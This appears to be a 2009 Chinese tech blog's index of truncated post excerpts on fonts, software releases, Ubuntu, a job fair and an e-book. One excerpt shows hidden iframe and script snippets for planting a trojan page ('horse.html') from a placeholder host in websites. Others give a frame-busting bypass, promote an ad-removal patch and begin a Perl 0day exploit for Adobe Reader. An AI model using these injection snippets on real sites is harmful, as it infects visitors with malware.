开发代号为“盘古”的文泉驿正黑 0.8.38 版本已由文泉驿团队正式发布。

从 0.6.23发布到现在已经过去了253天，在这漫长的8个月又8天的时间中，文泉驿的参与者几乎没有一天停止对开源字体的开发和改进。如果我们真的希望 赋予这个新字体一点意义的话，请把它变成对这些参与者的敬意吧；如果你真的希望做些什么来表达你的谢意，那么就请你真正用心来使用和体会，体会这个字体给 你带来的自由，带来的轻松心境，让它成为你向往正直的、无拘无束自由生活的开始。

1.挂马的N种方法

(1) HTML挂马法。
常规的HTML挂马方法一般是在网页中插入一条iframe语句，像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂，一般是查找一下关键词iframe。

(2) 再隐藏一点的就是js挂马了。
像再原来的网页中写入<script str=http://www.xxx.com/horse.js></script>，horse里的js写法一般为 document.write(’http://www.xxx.com/horse.html’>;，或者专业一点的写法是 top.document.body.innerHTML  = top.document.body.innerHTML + ‘ <inframe src=”http://www.xxx.com/horse.htm/”></iframe>’;。不过第2种写法要注意：是原来的网页种要有body标签。

(3)......

iRoundPic v3.8.1 多国语言版是零操作多用途制作，快速自动生成圆角图片、多边形图片、为图片加水印、转换图片格式、压缩图片尺寸，全部支持批量操作。完全本地化的软件操作使用，不用上传到网络制作以避免原始图片素材的流失，保证你原始图片的本地私密和安全。

通过iRoundPic v3.8.1的丰富的功能，能为您实现墙纸制作、手机墙纸制作、批量图片格式转换、批量图片压缩、批量图片水印添加等复合任务。简单的熟悉与使用软件，您会发现iRoundPic v3.8.1非但使用上极为便利，同时又包含了丰富的功能，方便您自己定义更具个性的制作。

iframe的防插与强插，网上通用的防插那版是（子）：

if(top.location != self.location){
top.location = self.location;
}

强插方案为（父）：
 

var location="";

其中这个location是对被赋值的top.location方法的覆盖，导致方法失效。

......

前2天腾讯刚放出QQ2009 beta2的会员测试版的时候，我就和L同学说，过不了2天，QQ2009 beta2 正式版就会放出来了，先让会员爽2天好让他们感觉自己与众不同，认为会员冲的值，继续续费；也刺激一下非会员的朋友，让他们冲会员，而且又不敢把会员版和大众版之间的时间隔的太久，毕竟众怒难犯。

果然不出所料，腾讯于今天放出了QQ2009 beta2 正式版。总的来说，就是邪恶之极，淫荡之极。

记得以前没有移动硬盘，只有容量可怜的U盘时，经常碰到一些大的文件，需要带到另外一台没有联网的机器上，这时就需要文件分割了，但是文件一般都很大，用RAR分卷压缩时间太久，有时候太浪费时间了，干脆就懒得带了。网上的一些分割软件又懒得用，而且速度也不是太好。

今天看到一个命令行下的分割工具 —— Zeal 0.11，可执行文件只有24K，开源，据小众测试，700M的文件分割成5份只需要844毫秒，相当恐怖的速度。另：小众说要分割的文件必须放在根目录，Zeal 0.11版里好像不存在这个问题了。目前的Zeal 0.11好像还不支持NTFS，只支持FAT32。

Zeal 0.11的使用方法

......

今天，第一次参加了传说中的招聘会。地点：徐州国际会展中心，主办方：（徐州招聘网还是徐州英才网，2个我容易搞混，还是本来就是一个？），下面开始流水账吧。

早上8点多，接近9点，挤车，坐到国际会展中心，下车后发现一个比较严重的问题，一车的人都下的差不多了，而且下车之后都是朝一个方向走去——国际会展中心。接近会展中心之后发现来应聘的人占了小半个广场（这广场挺大的），然后只排队就排了一长溜。从这头到那头。。。。。

L某某同学说，他下了最新的暴风影音 2009.02.19，用我以前提供下载的 暴风影音去广告补丁 v1.81，已经不能很好的去广告了，有时候暴风影音还提示文件被修改，需要恢复之类的东西。

应其需要，提供寒星最新制作的暴风影音最新去广告补丁 v1.82 for Storm 2009.02.19，此版本特对应暴风影音的2009.02.19版本。

补丁特点：去界面广告、通吃各种版本、具备还原功能、具有防错提示。暴风影音最新去广告补丁 v1.82 重新调整去广告选项，加入多开支持，改进优化配置功能。

按Ubuntu 9.04 Jaunty Jackalope 发布时间表来看，Ubuntu 9.04 Alpha5 应该于昨天2月26号就发布的，但是今天才看到消息说Ubuntu 9.04 Alpha5 发布了，还好，只要不跳票就行。

老早就听说过ibus的大名，不过当时的ibus虽然易用但还不是很稳定，于是夜火我就一直用的Ubuntu默认的scim。现在 ibus 1.1.0 出来了，应该会稳定很多了，等2天有空了，进尘封了N久的Ubuntu看看，然后把 ibus 1.1.0 装上试试，看看有没传闻中的那么好用。

ibus输入法从0.1.1版本号一跃至ibus 1.1.0，显示着这是一个全新的版本。事实也是如此。如果你看了这个版本的源代码，你会发现ibus输入法的核心部分，已经用C语言来实现了！

《大话设计模式》PDF电子书 通篇都是以情景对话的形式，用多个小故事或编程示例来组织讲解GoF（设计模式的经典名著——Design Patterns：Elements of Reusable Object-Oriented Software，中译本名为《设计模式——可复用面向对象软件的基础》的四位作者Erich Gamma、Richard Helm、Ralph Johnson，以及John Vlissides，这四人常被称为Gang of Four，即四人组，简称GoF）总结的23个设计模式。夜火我看了为初学者介绍面向对象基本概念的内容，感觉这本《大话设计模式》非常不错，分享给大家一起看。

本书共分为29章（目录见下文）。其中，第1、3、4、5章着重讲解了面向对象的意义、好处以及几个重要的设计原则；第2章，以及第6到第28章详细讲解了23个设计模式；第29章是对设计模式的全面总结。

附录部分是通过一个例子的演变为初学者介绍了面向对象的基本概念。

Adobe PDF阅读器JBIG2本地缓冲区溢出漏洞 0day利用工具exploit

#!/usr/bin/perl
# k`sOSe 02/22/2009

# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

......